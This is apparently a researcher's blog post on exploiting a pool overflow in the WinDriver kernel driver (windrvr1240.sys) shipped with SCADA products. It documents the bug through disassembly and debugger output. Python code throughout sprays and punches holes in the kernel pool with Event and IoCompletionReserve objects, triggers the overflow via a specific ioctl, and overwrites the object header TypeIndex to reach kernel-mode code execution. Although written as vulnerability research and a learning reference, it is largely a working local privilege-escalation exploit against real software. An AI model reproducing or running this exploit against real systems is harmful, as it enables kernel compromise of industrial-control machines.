Sharks in the Pool :: Mixed Object Exploitation in the Windows Kernel Pool

In the past I have spent a lot of time researching web-related vulnerabilities and exploitation, and whilst I’m relatively well versed in usermode exploitation, I needed to get up to speed on Windows kernel exploitation. Too many times I have tested targets that ship kernel device drivers that I did not go after due to a sheer lack of knowledge. Gaining low privileged code execution is fun, but gaining ring 0 is better!

TL;DR; I explain a basic kernel pool overflow vulnerability and how you can exploit it by overwriting the TypeIndex after spraying the kernel pool with a mix of kernel objects.

Introduction

After reviewing some online kernel tutorials I really wanted to find and exploit a few kernel vulnerabilities of my own. Whilst I think the HackSys Extreme Vulnerable Driver (HEVD) is a great learning tool, for me, it doesn’t work. I have always enjoyed finding and exploiting vulnerabilities in real applications as they present a hurdle that is often not so obvious.

Recently I have been very slowly (methodically, almost insanely) developing a Windows kernel device driver fuzzer. Using this private fuzzer (eta wen publik jelbrek?), I found the vulnerability presented in this post. The technique demonstrated for exploitation is nothing new, but its slight variation allows an attacker to exploit basically any pool size. This blog post is mostly a reference for myself, but hopefully it benefits someone else attempting pool exploitation for the first time.

The vulnerability

After testing a few SCADA products, I came across a third party component called “WinDriver”. After a short investigation I realized this is Jungo’s DriverWizard WinDriver. This product is bundled and shipped in several SCADA applications, often with an old version too.

The installer drops a device driver named windrvr1240.sys into the standard Windows driver folder. With some basic reverse engineering, I found several ioctl codes that I plugged directly into my fuzzer’s config file.

{
    "ioctls_range":{
        "start": "0x95380000",
        "end": "0x9538ffff"
    }
}
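The range in that config covers every ioctl code that shares one device type. As a rough sketch, assuming the standard CTL_CODE bit layout (device type in bits 31-16, access in bits 15-14, function in bits 13-2, method in bits 1-0), the fields can be pulled apart like this. The helper name `decode_ioctl` is made up for illustration, and 0x953824b7 is the ioctl used to trigger the bug later in this post.

```python
def decode_ioctl(code):
    """Split a 32-bit ioctl code into its CTL_CODE fields."""
    return {
        "device_type": (code >> 16) & 0xFFFF,  # bits 31-16
        "access": (code >> 14) & 0x3,          # bits 15-14
        "function": (code >> 2) & 0xFFF,       # bits 13-2
        "method": code & 0x3,                  # bits 1-0
    }


# Both ends of the fuzzing range share the same device type.
start = decode_ioctl(0x95380000)
end = decode_ioctl(0x9538ffff)
print(hex(start["device_type"]), hex(end["device_type"]))

# The ioctl that reaches the vulnerable function.
fields = decode_ioctl(0x953824b7)
print(dict((name, hex(value)) for name, value in fields.items()))
```

Fuzzing the whole low word therefore walks every access, function and method combination for that one device type.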

Then, I enabled special pool using verifier /volatile /flags 0x1 /adddriver windrvr1240.sys and ran my fuzzer for a little bit. I eventually found several exploitable vulnerabilities; this one in particular stood out:

kd> .trap 0xffffffffc800f96c

ErrCode = 00000002

eax=e4e4e4e4 ebx=8df44ba8 ecx=8df45004 edx=805d2141 esi=f268d599 edi=00000088

eip=9ffbc9e5 esp=c800f9e0 ebp=c800f9ec iopl=0 nv up ei pl nz na pe cy

cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010207

windrvr1240+0x199e5:

9ffbc9e5 8941fc mov dword ptr [ecx-4],eax ds:0023:8df45000=????????

kd> dd esi+ecx-4

805d2599 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4

805d25a9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4

805d25b9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4

805d25c9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4

805d25d9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4

805d25e9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4

805d25f9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4

805d2609 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4

That’s user controlled data read from [esi+ecx-4], and it’s being written out-of-bounds of a kernel pool buffer. Nice. On closer inspection, I noticed that this is actually a pool overflow triggered via an inline copy operation at loc_4199D8.

.text:0041998E sub_41998E proc near ; CODE XREF: sub_419B7C+3B2

.text:0041998E

.text:0041998E arg_0 = dword ptr 8

.text:0041998E arg_4 = dword ptr 0Ch

.text:0041998E

.text:0041998E push ebp

.text:0041998F mov ebp, esp

.text:00419991 push ebx

.text:00419992 mov ebx, [ebp+arg_4]

.text:00419995 push esi

.text:00419996 push edi

.text:00419997 push 458h ; fixed size_t +0x8 == 0x460

.text:0041999C xor edi, edi

.text:0041999E push edi ; int

.text:0041999F push ebx ; void *

.text:004199A0 call memset ; memset our buffer before the overflow

.text:004199A5 mov edx, [ebp+arg_0] ; this is the SystemBuffer

.text:004199A8 add esp, 0Ch

.text:004199AB mov eax, [edx]

.text:004199AD mov [ebx], eax

.text:004199AF mov eax, [edx+4]

.text:004199B2 mov [ebx+4], eax

.text:004199B5 mov eax, [edx+8]

.text:004199B8 mov [ebx+8], eax

.text:004199BB mov eax, [edx+10h]

.text:004199BE mov [ebx+10h], eax

.text:004199C1 mov eax, [edx+14h]

.text:004199C4 mov [ebx+14h], eax

.text:004199C7 mov eax, [edx+18h] ; read our controlled size from SystemBuffer

.text:004199CA mov [ebx+18h], eax ; store it in the new kernel buffer

.text:004199CD test eax, eax

.text:004199CF jz short loc_4199ED

.text:004199D1 mov esi, edx

.text:004199D3 lea ecx, [ebx+1Ch] ; index offset for the first write

.text:004199D6 sub esi, ebx

.text:004199D8

.text:004199D8 loc_4199D8: ; CODE XREF: sub_41998E+5D

.text:004199D8 mov eax, [esi+ecx] ; load the first write value from the buffer

.text:004199DB inc edi ; copy loop index

.text:004199DC mov [ecx], eax ; first dword write

.text:004199DE lea ecx, [ecx+8] ; set the index into our overflown buffer

.text:004199E1 mov eax, [esi+ecx-4] ; load the second write value from the buffer

.text:004199E5 mov [ecx-4], eax ; second dword write

.text:004199E8 cmp edi, [ebx+18h] ; compare against our controlled size

.text:004199EB jb short loc_4199D8 ; jump back into loop

The copy loop copies 8 bytes on every iteration (a qword) and overflows a buffer of size 0x460 (0x458 + the 0x8 byte header). The iteration count is directly attacker controlled from the input buffer (yep, you read that right). No integer overflow, no value stored in some obscure place, nada. We can see at 0x004199E8 that the count comes from the +0x18 offset of the supplied buffer. Too easy!
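To make the loop arithmetic concrete, here is a small model of how far the copy runs for a given count. It is only a sketch built from the numbers in the listing above (first write at +0x1c, 8 bytes per iteration, 0x458 bytes of usable buffer); the function name is made up for illustration.

```python
CHUNK_SIZE = 0x460           # pool chunk including its header
POOL_HEADER_SIZE = 0x8
DATA_SIZE = CHUNK_SIZE - POOL_HEADER_SIZE   # 0x458 usable bytes
FIRST_WRITE_OFFSET = 0x1c    # lea ecx, [ebx+1Ch]
BYTES_PER_ITERATION = 0x8    # two dword writes per pass


def bytes_past_end(count):
    """Return how many bytes the copy loop writes beyond the buffer."""
    if count == 0:
        return 0  # the jz at 0x004199CF skips the loop entirely
    last_byte_written = FIRST_WRITE_OFFSET + BYTES_PER_ITERATION * count
    return max(0, last_byte_written - DATA_SIZE)


for count in (0x87, 0x88, 0x8d):
    print("count 0x%x -> 0x%x bytes out of bounds" % (count, bytes_past_end(count)))
```

Any count above 0x87 starts writing past the end of the allocation.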

Exploitation

Now comes the fun bit. A generic technique that can be used is the object TypeIndex overwrite which has been blogged on numerous occasions (see references) and is at least 6 years old, so I won’t go into too much detail. Basically the tl;dr; is that using any kernel object, you can overwrite the TypeIndex stored in the _OBJECT_HEADER.

Some common objects that have been used in the past are the Event object (size 0x40) and the IoCompletionReserve object (size 0x60). Typical exploitation goes like this:

- Spray the pool with an object of size X, filling pages of memory.

- Make holes in the pages by freeing/releasing adjacent objects, triggering coalescing to match the target chunk size (in our case 0x460).

- Allocate and overflow the buffer, hopefully landing into a hole, smashing the next object’s _OBJECT_HEADER, thus, pwning the TypeIndex.

For example, say your overflowed buffer is size 0x200. You could allocate a whole bunch of Event objects, free 0x8 of them (0x40 * 0x8 == 0x200) and voilà, you have your hole where you can allocate and overflow. So, assuming that, we need a kernel object whose size divides evenly into our pool chunk size.

The problem is, that doesn’t work with some sizes. For example our pool size is 0x460, so if we do:

>>> 0x460 % 0x40

32

>>> 0x460 % 0x60

64

>>>

We always have a remainder. This means we cannot craft a hole that will neatly fit our chunk, or can we? There are a few ways to solve it. One way is to search for a kernel object whose size divides evenly into our target buffer size. I spent a little time doing this and found two other kernel objects:

# 1

type = "Job"

size = 0x168

windll.kernel32.CreateJobObjectW(None, None)

# 2

type = "Timer"

size = 0xc8

windll.kernel32.CreateWaitableTimerW(None, 0, None)

However, those sizes were no use as they do not divide evenly into 0x460 either. After some time testing and playing around, I realized that we can do this:

>>> 0x460 % 0xa0

0

>>>

Great! So 0xa0 can be divided evenly into 0x460, but how do we get kernel objects of size 0xa0? As it turns out, we combine the Event and the IoCompletionReserve objects (0x40 + 0x60 = 0xa0).
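The same search can be done mechanically. The sketch below only checks arithmetic: it takes the four object sizes quoted above and lists which combinations add up to a unit that divides the target chunk size. The helper name is made up, and a combination fitting on paper says nothing about whether those objects live in the same pool or can be interleaved in practice.

```python
from itertools import combinations

# Object sizes as quoted in this post.
OBJECT_SIZES = {
    "Event": 0x40,
    "IoCompletionReserve": 0x60,
    "Timer": 0xc8,
    "Job": 0x168,
}


def combos_that_fit(target, sizes=OBJECT_SIZES):
    """List (names, combined size, repeat count) for combos dividing target."""
    fits = []
    for n in range(1, len(sizes) + 1):
        for names in combinations(sorted(sizes), n):
            total = sum(sizes[name] for name in names)
            if target % total == 0:
                fits.append((names, total, target // total))
    return fits


for names, total, repeats in combos_that_fit(0x460):
    print("%s -> 0x%x x %d" % (" + ".join(names), total, repeats))
```

The Event + IoCompletionReserve pair shows up as 0xa0 repeated 7 times, which is the combination used for the rest of this post.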

The Spray

def we_can_spray():
    """
    Spray the Kernel Pool with IoCompletionReserve and Event Objects.
    The IoCompletionReserve object is 0x60 and Event object is 0x40 bytes in length.
    These are allocated from the Nonpaged kernel pool.
    """
    handles = []
    IO_COMPLETION_OBJECT = 1
    for i in range(0, 25000):
        handles.append(windll.kernel32.CreateEventA(0,0,0,0))
        hHandle = HANDLE(0)
        handles.append(ntdll.NtAllocateReserveObject(byref(hHandle), 0x0, IO_COMPLETION_OBJECT))
    # could do with some better validation
    if len(handles) > 0:
        return True
    return False

This function sprays 50,000 objects: 25,000 Event objects and 25,000 IoCompletionReserve objects. This looks quite pretty in WinDbg:

kd> !pool 85d1f000

Pool page 85d1f000 region is Nonpaged pool

*85d1f000 size: 60 previous size: 0 (Allocated) *IoCo (Protected)

Owning component : Unknown (update pooltag.txt)

85d1f060 size: 60 previous size: 60 (Allocated) IoCo (Protected) <--- chunk first allocated in the page

85d1f0c0 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f100 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1f160 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f1a0 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1f200 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f240 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1f2a0 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f2e0 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1f340 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f380 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1f3e0 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f420 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1f480 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f4c0 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1f520 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f560 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1f5c0 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f600 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1f660 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f6a0 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1f700 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f740 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1f7a0 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f7e0 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1f840 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f880 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1f8e0 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f920 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1f980 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f9c0 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1fa20 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1fa60 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1fac0 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1fb00 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1fb60 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1fba0 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1fc00 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1fc40 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1fca0 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1fce0 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1fd40 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1fd80 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1fde0 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1fe20 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1fe80 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1fec0 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1ff20 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1ff60 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1ffc0 size: 40 previous size: 60 (Allocated) Even (Protected)

Creating Holes

The ‘IoCo’ tag represents an IoCompletionReserve object and the ‘Even’ tag represents an Event object. Notice that our first chunk’s offset is 0x60; that’s the offset we will start freeing from. So if we free groups of objects, that is, an IoCompletionReserve and an Event together, our calculation becomes:

>>> "0x%x" % (0x7 * 0xa0)

'0x460'

>>>

We will end up with the correct size. Let’s take a quick look at what it looks like if we free the next 7 IoCompletionReserve objects only.

kd> !pool 85d1f000

Pool page 85d1f000 region is Nonpaged pool

*85d1f000 size: 60 previous size: 0 (Allocated) *IoCo (Protected)

Owning component : Unknown (update pooltag.txt)

85d1f060 size: 60 previous size: 60 (Free) IoCo

85d1f0c0 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f100 size: 60 previous size: 40 (Free) IoCo

85d1f160 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f1a0 size: 60 previous size: 40 (Free) IoCo

85d1f200 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f240 size: 60 previous size: 40 (Free) IoCo

85d1f2a0 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f2e0 size: 60 previous size: 40 (Free) IoCo

85d1f340 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f380 size: 60 previous size: 40 (Free) IoCo

85d1f3e0 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f420 size: 60 previous size: 40 (Free) IoCo

85d1f480 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f4c0 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1f520 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f560 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1f5c0 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f600 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1f660 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f6a0 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1f700 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f740 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1f7a0 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f7e0 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1f840 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f880 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1f8e0 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f920 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1f980 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1f9c0 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1fa20 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1fa60 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1fac0 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1fb00 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1fb60 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1fba0 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1fc00 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1fc40 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1fca0 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1fce0 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1fd40 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1fd80 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1fde0 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1fe20 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1fe80 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1fec0 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1ff20 size: 40 previous size: 60 (Allocated) Even (Protected)

85d1ff60 size: 60 previous size: 40 (Allocated) IoCo (Protected)

85d1ffc0 size: 40 previous size: 60 (Allocated) Even (Protected)

So we can see we have separate freed chunks. But we want to coalesce them into a single 0x460 freed chunk. To achieve this, we need to set the offset for our chunks to 0x60 (the first pointing to 0xXXXXY060) and free the Event objects in between as well.

bin = []
# object sizes
CreateEvent_size = 0x40
IoCompletionReserve_size = 0x60
combined_size = CreateEvent_size + IoCompletionReserve_size
# after the 0x20 chunk hole, the first object will be the IoCompletionReserve object
offset = IoCompletionReserve_size
for i in range(offset, offset + (7 * combined_size), combined_size):
    try:
        # chunks need to be next to each other for the coalesce to take effect
        bin.append(khandlesd[obj + i])
        bin.append(khandlesd[obj + i - IoCompletionReserve_size])
    except KeyError:
        pass
# make sure it's contiguously allocated memory
if len(tuple(bin)) == 14:
    holes.append(tuple(bin))

# make the holes to fill
for hole in holes:
    for handle in hole:
        kernel32.CloseHandle(handle)

Now, when we run the freeing function, we punch holes into the pool and get a freed chunk of our target size.

kd> !pool 8674e000

Pool page 8674e000 region is Nonpaged pool

*8674e000 size: 460 previous size: 0 (Free) *Io <-- 0x460 chunk is free

Pooltag Io : general IO allocations, Binary : nt!io

8674e460 size: 60 previous size: 460 (Allocated) IoCo (Protected)

8674e4c0 size: 40 previous size: 60 (Allocated) Even (Protected)

8674e500 size: 60 previous size: 40 (Allocated) IoCo (Protected)

8674e560 size: 40 previous size: 60 (Allocated) Even (Protected)

8674e5a0 size: 60 previous size: 40 (Allocated) IoCo (Protected)

8674e600 size: 40 previous size: 60 (Allocated) Even (Protected)

8674e640 size: 60 previous size: 40 (Allocated) IoCo (Protected)

8674e6a0 size: 40 previous size: 60 (Allocated) Even (Protected)

8674e6e0 size: 60 previous size: 40 (Allocated) IoCo (Protected)

8674e740 size: 40 previous size: 60 (Allocated) Even (Protected)

8674e780 size: 60 previous size: 40 (Allocated) IoCo (Protected)

8674e7e0 size: 40 previous size: 60 (Allocated) Even (Protected)

8674e820 size: 60 previous size: 40 (Allocated) IoCo (Protected)

8674e880 size: 40 previous size: 60 (Allocated) Even (Protected)

8674e8c0 size: 60 previous size: 40 (Allocated) IoCo (Protected)

8674e920 size: 40 previous size: 60 (Allocated) Even (Protected)

8674e960 size: 60 previous size: 40 (Allocated) IoCo (Protected)

8674e9c0 size: 40 previous size: 60 (Allocated) Even (Protected)

8674ea00 size: 60 previous size: 40 (Allocated) IoCo (Protected)

8674ea60 size: 40 previous size: 60 (Allocated) Even (Protected)

8674eaa0 size: 60 previous size: 40 (Allocated) IoCo (Protected)

8674eb00 size: 40 previous size: 60 (Allocated) Even (Protected)

8674eb40 size: 60 previous size: 40 (Allocated) IoCo (Protected)

8674eba0 size: 40 previous size: 60 (Allocated) Even (Protected)

8674ebe0 size: 60 previous size: 40 (Allocated) IoCo (Protected)

8674ec40 size: 40 previous size: 60 (Allocated) Even (Protected)

8674ec80 size: 60 previous size: 40 (Allocated) IoCo (Protected)

8674ece0 size: 40 previous size: 60 (Allocated) Even (Protected)

8674ed20 size: 60 previous size: 40 (Allocated) IoCo (Protected)

8674ed80 size: 40 previous size: 60 (Allocated) Even (Protected)

8674edc0 size: 60 previous size: 40 (Allocated) IoCo (Protected)

8674ee20 size: 40 previous size: 60 (Allocated) Even (Protected)

8674ee60 size: 60 previous size: 40 (Allocated) IoCo (Protected)

8674eec0 size: 40 previous size: 60 (Allocated) Even (Protected)

8674ef00 size: 60 previous size: 40 (Allocated) IoCo (Protected)

8674ef60 size: 40 previous size: 60 (Allocated) Even (Protected)

8674efa0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
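The difference between the two freeing strategies can be reproduced with a toy model of a single page. This is only a sketch: it lays out chunks the way the sprayed page at 85d1f000 looks (one 0x60 chunk, then 25 IoCo/Event pairs), marks a set of offsets as free and merges neighbouring free chunks. It does not model the real allocator's lists or headers, and all names are made up for illustration.

```python
def build_page():
    """Lay out one 0x1000 page: a 0x60 chunk, then 25 IoCo/Event pairs."""
    sizes = [0x60] + [0x60, 0x40] * 25
    chunks, offset = [], 0
    for size in sizes:
        chunks.append({"offset": offset, "size": size, "free": False})
        offset += size
    return chunks


def free_and_coalesce(chunks, offsets):
    """Mark the chunks at `offsets` free and merge adjacent free chunks."""
    merged = []
    for chunk in chunks:
        chunk = dict(chunk, free=chunk["free"] or chunk["offset"] in offsets)
        if merged and merged[-1]["free"] and chunk["free"]:
            merged[-1]["size"] += chunk["size"]  # grow the previous free chunk
        else:
            merged.append(chunk)
    return merged


def largest_free(chunks):
    return max([c["size"] for c in chunks if c["free"]] or [0])


page = build_page()
iocompletion_only = set(0x60 + i * 0xa0 for i in range(7))
pairs = iocompletion_only | set(0xc0 + i * 0xa0 for i in range(7))

print(hex(largest_free(free_and_coalesce(page, iocompletion_only))))
print(hex(largest_free(free_and_coalesce(page, pairs))))
```

Freeing only the IoCompletionReserve objects leaves holes no bigger than 0x60, while freeing seven adjacent pairs produces one 0x460 hole.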

We can see that the freed chunks have been coalesced and now we have a perfect sized hole. All we need to do is allocate and overwrite.

def we_can_trigger_the_pool_overflow():
    """
    This triggers the pool overflow vulnerability using a buffer of size 0x460.
    """
    GENERIC_READ = 0x80000000
    GENERIC_WRITE = 0x40000000
    OPEN_EXISTING = 0x3
    DEVICE_NAME = "\\\\.\\WinDrvr1240"
    dwReturn = c_ulong()
    driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
    inputbuffer = 0x41414141
    inputbuffer_size = 0x5000
    outputbuffer_size = 0x5000
    outputbuffer = 0x20000000
    alloc_pool_overflow_buffer(inputbuffer, inputbuffer_size)
    IoStatusBlock = c_ulong()
    if driver_handle:
        dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, None, None, None, byref(IoStatusBlock), 0x953824b7,
                                                inputbuffer, inputbuffer_size, outputbuffer, outputbuffer_size)
        return True
    return False

Surviving the Overflow

You may have noticed the null dword in the exploit at offset 0x90 within the buffer.

def alloc_pool_overflow_buffer(base, input_size):
    """
    Craft our special buffer to trigger the overflow.
    """
    print "(+) allocating pool overflow input buffer"
    baseadd = c_int(base)
    size = c_int(input_size)
    input = "\x41" * 0x18 # offset to size
    input += struct.pack("<I", 0x0000008d) # controlled size (this triggers the overflow)
    input += "\x42" * (0x90-len(input)) # padding to survive bsod
    input += struct.pack("<I", 0x00000000) # use a NULL dword for sub_4196CA
    input += "\x43" * ((0x460-0x8)-len(input)) # fill our pool buffer

This is needed to survive the overflow and avoid any further processing. The following code listing is executed directly after the copy loop.

.text:004199ED loc_4199ED: ; CODE XREF: sub_41998E+41

.text:004199ED push 9

.text:004199EF pop ecx

.text:004199F0 lea eax, [ebx+90h] ; controlled from the copy

.text:004199F6 push eax ; void *

.text:004199F7 lea esi, [edx+6Ch] ; controlled offset

.text:004199FA lea eax, [edx+90h] ; controlled offset

.text:00419A00 lea edi, [ebx+6Ch] ; controlled from copy

.text:00419A03 rep movsd

.text:00419A05 push eax ; int

.text:00419A06 call sub_4196CA ; call sub_4196CA

The important point is that the code will call sub_4196CA. Also note that @eax becomes our buffer +0x90 (0x004199FA). Let’s take a look at that function call.

.text:004196CA sub_4196CA proc near ; CODE XREF: sub_4195A6+1E

.text:004196CA ; sub_41998E+78 ...

.text:004196CA

.text:004196CA arg_0 = dword ptr 8

.text:004196CA arg_4 = dword ptr 0Ch

.text:004196CA

.text:004196CA push ebp

.text:004196CB mov ebp, esp

.text:004196CD push ebx

.text:004196CE mov ebx, [ebp+arg_4]

.text:004196D1 push edi

.text:004196D2 push 3C8h ; size_t

.text:004196D7 push 0 ; int

.text:004196D9 push ebx ; void *

.text:004196DA call memset

.text:004196DF mov edi, [ebp+arg_0] ; controlled buffer

.text:004196E2 xor edx, edx

.text:004196E4 add esp, 0Ch

.text:004196E7 mov [ebp+arg_4], edx

.text:004196EA mov eax, [edi] ; make sure @eax is null

.text:004196EC mov [ebx], eax ; the write here is fine

.text:004196EE test eax, eax

.text:004196F0 jz loc_4197CB ; take the jump

The code gets a dword value from our SystemBuffer at +0x90, writes to our overflowed buffer and then tests it for null. If it’s null, we can avoid further processing in this function and return.

.text:004197CB loc_4197CB: ; CODE XREF: sub_4196CA+26

.text:004197CB pop edi

.text:004197CC pop ebx

.text:004197CD pop ebp

.text:004197CE retn 8

If we don’t do this, we will likely BSOD when attempting to access non-existent pointers from our buffer within this function (we could probably survive this anyway).

Now we can return cleanly and trigger the eop without any issues. For the shellcode cleanup, our overflown buffer is stored in @esi, so we can calculate the offset to the TypeIndex and patch it up. Finally, smashing the ObjectCreateInfo with null is fine because the system will just avoid using that pointer.

Crafting Our Buffer

Since the loop copies 0x8 bytes on every iteration and since the starting index is 0x1c:

.text:004199D3 lea ecx, [ebx+1Ch] ; index offset for the first write

We can do our overflow calculation like so. Let’s say we want to overflow the buffer by 44 bytes (0x2c). We take the buffer size, subtract the header, subtract the starting index offset, add the number of bytes we want to overflow and divide it all by 0x8 (due to the qword copy per loop iteration). That becomes (0x460 - 0x8 - 0x1c + 0x2c) / 0x8 = 0x8d.

So a size of 0x8d will overflow the buffer by 0x2c or 44 bytes. This smashes the pool header, quota and object header.
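The calculation is easy to wrap in a helper. This is just the formula above written out, with one extra check that is my own addition: because the loop writes 8 bytes at a time starting at +0x1c, only overflow lengths that make the total a multiple of 8 are reachable. The function name is made up for illustration.

```python
CHUNK_SIZE = 0x460
POOL_HEADER_SIZE = 0x8
FIRST_WRITE_OFFSET = 0x1c
BYTES_PER_ITERATION = 0x8


def count_for_overflow(overflow_bytes):
    """Return the loop count that writes overflow_bytes past the buffer."""
    span = CHUNK_SIZE - POOL_HEADER_SIZE - FIRST_WRITE_OFFSET + overflow_bytes
    if span % BYTES_PER_ITERATION:
        raise ValueError("0x%x bytes is not reachable in whole iterations" % overflow_bytes)
    return span // BYTES_PER_ITERATION


# 11 dwords of headers get rewritten in the next chunk: 11 * 4 == 0x2c
print(hex(count_for_overflow(11 * 4)))
```

The 0x2c bytes correspond to the eleven dwords of pool header, quota info and object header rebuilt in the listing that follows.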

# repair the allocated chunk header...

input += struct.pack("<I", 0x040c008c) # _POOL_HEADER

input += struct.pack("<I", 0xef436f49) # _POOL_HEADER (PoolTag)

input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO

input += struct.pack("<I", 0x0000005c) # _OBJECT_HEADER_QUOTA_INFO

input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO

input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO

input += struct.pack("<I", 0x00000001) # _OBJECT_HEADER (PointerCount)

input += struct.pack("<I", 0x00000001) # _OBJECT_HEADER (HandleCount)

input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER (Lock)

input += struct.pack("<I", 0x00080000) # _OBJECT_HEADER (TypeIndex)

input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER (ObjectCreateInfo)

We can see that we set the TypeIndex dword to 0x00080000, which sets the TypeIndex itself (actually, it’s the lower word) to null. This means that the function table will point to 0x0 and, conveniently enough, we can map the null page.

kd> dd nt!ObTypeIndexTable L2

82b7dee0 00000000 bad0b0b0

Note that the second index is 0xbad0b0b0. I get a funny feeling I can use this same technique on x64 as well :->
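Going back to the 0x00080000 dword written over the object header, it helps to see which bytes end up where. The sketch below assumes the 32-bit Windows 7 _OBJECT_HEADER layout, where the dword at +0xc holds four one-byte fields in the order TypeIndex, TraceFlags, InfoMask, Flags. That layout is my assumption and is not shown in this post, so check it with dt nt!_OBJECT_HEADER on the target.

```python
import struct


def split_header_dword(value):
    """Split the dword at _OBJECT_HEADER+0xc into its four byte fields.

    Field order is an assumption based on the 32-bit Windows 7 layout.
    """
    type_index, trace_flags, info_mask, flags = struct.unpack(
        "<4B", struct.pack("<I", value))
    return {
        "TypeIndex": type_index,
        "TraceFlags": trace_flags,
        "InfoMask": info_mask,
        "Flags": flags,
    }


print(split_header_dword(0x00080000))
```

Under that assumption the write keeps the InfoMask byte at 0x8 while the TypeIndex byte becomes 0, so the lookup lands on the first entry of nt!ObTypeIndexTable shown above.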

